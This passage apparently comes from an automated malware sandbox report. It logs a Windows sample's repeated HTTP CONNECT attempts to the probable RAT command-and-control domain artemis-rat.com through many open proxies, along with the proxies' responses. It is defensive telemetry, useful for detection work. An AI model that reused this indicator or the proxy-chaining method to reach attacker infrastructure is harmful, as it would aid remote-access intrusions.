0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1298192.168.2.454056185.38.111.180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.195352077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.516805887 CET75INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:23.870702982 CET103INHTTP/1.1 400 Bad Request
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                              Data Ascii: 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1299192.168.2.454046185.158.114.14259837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.198298931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1300192.168.2.45403614.232.235.1380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.198848009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.543931961 CET72INHTTP/1.1 200 Connection established
                                              Proxy-Agent: Fortinet-Proxy/1.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1301192.168.2.45347841.65.227.9819767284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.238492012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257148981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366637945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366414070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.366297007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:59.366283894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:11.381903887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:35.506865978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:23.508300066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1302192.168.2.45407020.33.5.2788887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.259648085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.053926945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.070099115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163614035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.163379908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.070321083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.069612980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1303192.168.2.45407365.109.231.14231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.287766933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.053930044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.070055962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163614988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.054338932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:40.855715990 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1304192.168.2.454010117.160.250.13888997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.289411068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.743521929 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1305192.168.2.454069146.59.18.246580317284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.289881945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.072979927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1306192.168.2.45244423.254.231.55807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.289940119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.089112043 CET986INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:26 GMT
                                              Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                              Content-Length: 770
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 67 20 50 48 50 2f 37 2e 34 2e 37 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at postmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 Server at artemis-rat.com Port 443</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1307192.168.2.452325121.171.57.231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.292316914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.356704950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366525888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366483927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.366194963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1308192.168.2.454068177.136.84.2009997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.292319059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.053989887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.070442915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163928032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1309192.168.2.45407236.66.36.25241537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.297611952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1310192.168.2.454039116.199.168.141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.335623026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1311192.168.2.452379194.163.149.12311117284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.349452019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.356712103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366545916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366485119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.366231918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:59.366214037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:23.468089104 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1312192.168.2.45248251.222.241.157225387284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.358272076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.356734991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366545916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366485119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.366215944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:59.366307974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:11.526595116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:35.522567987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:23.522488117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
